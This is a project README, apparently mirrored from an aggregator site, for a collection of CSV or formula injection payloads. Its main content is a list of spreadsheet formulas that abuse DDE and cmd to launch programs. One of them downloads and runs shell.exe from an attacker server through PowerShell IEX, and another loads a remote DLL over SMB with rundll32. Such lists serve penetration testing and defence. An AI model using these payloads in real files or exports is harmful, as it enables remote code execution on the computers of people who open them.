Csv Injection Payloads Save

🎯 CSV Injection Payloads

Project README

CSV Injection Payloads

CSV Injection, also known as Formula Injection, occurs when websites embed untrusted input inside CSV files.

Payloads :

=DDE("cmd";"/C calc";"!A0")A0
@SUM(1+9)*cmd|' /C calc'!A0
=10+20+cmd|' /C calc'!A0
=cmd|' /C notepad'!'A1'
=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0
=cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1

References :

CSV Injection :
Cloning an Existing Repository ( Clone with HTTPS )
root@ismailtasdelen:~# git clone https://github.com/payloadbox/csv-injection-payloads.git
Cloning an Existing Repository ( Clone with SSH )
root@ismailtasdelen:~# git clone [email protected]:payloadbox/csv-injection-payloads.git

Support the authors:

LiberaPay:

Open Source Agenda is not affiliated with "Csv Injection Payloads" Project. README Source: payloadbox/csv-injection-payloads

Open Source Agenda Badge

Open Source Agenda Rating